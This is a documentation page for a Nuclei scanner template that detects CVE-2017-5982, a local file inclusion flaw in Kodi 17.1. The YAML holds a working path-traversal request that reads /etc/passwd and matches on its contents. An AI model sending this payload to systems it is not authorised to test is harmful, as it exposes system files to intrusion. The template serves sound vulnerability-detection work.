Kodi 17.1 - Local File Inclusion
ID: CVE-2017-5982
Severity: high
Author: 0x_Akoko
Tags: cve2017,cve,kodi,lfi,edb
Description
Section titled “Description”Kodi 17.1 is vulnerable to local file inclusion vulnerabilities because of insufficient validation of user input.
YAML Source
Section titled “YAML Source”id: CVE-2017-5982
info: name: Kodi 17.1 - Local File Inclusion author: 0x_Akoko severity: high description: | Kodi 17.1 is vulnerable to local file inclusion vulnerabilities because of insufficient validation of user input. remediation: | Upgrade Kodi to a version that is not affected by the CVE-2017-5982 vulnerability. reference: - https://cxsecurity.com/issue/WLB-2017020164 - https://www.exploit-db.com/exploits/41312/ - https://nvd.nist.gov/vuln/detail/CVE-2017-5982 - https://lists.debian.org/debian-lts-announce/2024/01/msg00009.html - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2017-5982 cwe-id: CWE-22 epss-score: 0.0372 epss-percentile: 0.91582 cpe: cpe:2.3:a:kodi:kodi:17.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: kodi product: kodi tags: cve2017,cve,kodi,lfi,edb
http: - method: GET path: - "{{BaseURL}}/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd"
matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0"
- type: status status: - 200# digest: 490a0046304402203c8e64e1ff4f1aa87434ce76a9dd8ed7620b1949fba0c0e03ef0b5b9c6cc9f950220754eddea139fcdb4573cec0640d9a209170814489ec0d17f087a61d442bb9699:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2017/CVE-2017-5982.yaml"